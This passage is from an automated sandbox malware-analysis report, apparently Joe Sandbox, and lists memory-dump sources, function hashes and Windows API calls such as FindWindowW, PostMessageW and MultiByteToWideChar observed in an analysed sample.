                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                        • String ID: aut
                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                        • Opcode ID: 995e32d44b53364fbc97b3234dea766e015abf7554476ae8c0584cadb4c6ce8f
                                                                                                                                        • Instruction ID: 0ef7d97136dfc1173d2c892fe33e4d23bd8be594aef39a4852c02868e397be00
                                                                                                                                        • Opcode Fuzzy Hash: 995e32d44b53364fbc97b3234dea766e015abf7554476ae8c0584cadb4c6ce8f
                                                                                                                                        • Instruction Fuzzy Hash: 6AD05E7290032867DA20E7A5AC0EFCB3F6CDB04750F0002A1B755E30A1DEF09984CBE0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocalTime
                                                                                                                                        • String ID: %.3d$X64
                                                                                                                                        • API String ID: 481472006-1077770165
                                                                                                                                        • Opcode ID: f952d72a779f1e86ffc6118731ab5e79e4c7e0d628e88c4041cfa2b9957f8e3a
                                                                                                                                        • Instruction ID: 265d49197d017060c35d314c78bb2948b0943d7ce43eff90b0b4d36bf48d49cd
                                                                                                                                        • Opcode Fuzzy Hash: f952d72a779f1e86ffc6118731ab5e79e4c7e0d628e88c4041cfa2b9957f8e3a
                                                                                                                                        • Instruction Fuzzy Hash: 83D012A1C08109EACB9097D0DCC59B9B3FCEF08381F60C4D2F91AA2041EA24C90A6B61
                                                                                                                                        APIs
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BB232C
                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BB233F
                                                                                                                                          • Part of subcall function 00B8E97B: Sleep.KERNEL32 ref: 00B8E9F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                        • Opcode ID: 8d9c7220d5a42b48d12cb8d56b398c9bb5017520ab81cdce8bf611ae3153d1da
                                                                                                                                        • Instruction ID: 1883f396df15217a73b716816337a5240921d5a6202b0efcad16ac7081fd1c5c
                                                                                                                                        • Opcode Fuzzy Hash: 8d9c7220d5a42b48d12cb8d56b398c9bb5017520ab81cdce8bf611ae3153d1da
                                                                                                                                        • Instruction Fuzzy Hash: 02D0A932380300B7E264B7309C0FFD66A44AB10B00F000A02B686AB0E0CAF0A800CA00
                                                                                                                                        APIs
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BB236C
                                                                                                                                        • PostMessageW.USER32(00000000), ref: 00BB2373
                                                                                                                                          • Part of subcall function 00B8E97B: Sleep.KERNEL32 ref: 00B8E9F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                        • Opcode ID: bcf90257046fb33354b9f9830d663491818dee11a8136ec147186dbb7a9aaeb0
                                                                                                                                        • Instruction ID: f497a344ebbaacb8b3d6781d45d946c79ae7dad888b76c1f7174340e3487906b
                                                                                                                                        • Opcode Fuzzy Hash: bcf90257046fb33354b9f9830d663491818dee11a8136ec147186dbb7a9aaeb0
                                                                                                                                        • Instruction Fuzzy Hash: EDD0C9323C1350BBE664B7719C0FFD66A54AB14B11F404A56B696AB1E0DAF0A841CA54
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00B5BE93
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B5BEA1
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B5BEFC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                        • Opcode ID: 0ee5b9ad0b15c53db3cf5030bd7ea19752b186227f57be63e7ef0f1a94b2712c
                                                                                                                                        • Instruction ID: 1622b79b35cd2d1cb848e3b37e3dcb0c775f87fa9b96d9f78aa7d789d303c9be
                                                                                                                                        • Opcode Fuzzy Hash: 0ee5b9ad0b15c53db3cf5030bd7ea19752b186227f57be63e7ef0f1a94b2712c
                                                                                                                                        • Instruction Fuzzy Hash: D841B135600216ABCB218F65CC85FBABBE5EF41312F1441E9FD59A71A1DB308D09DB60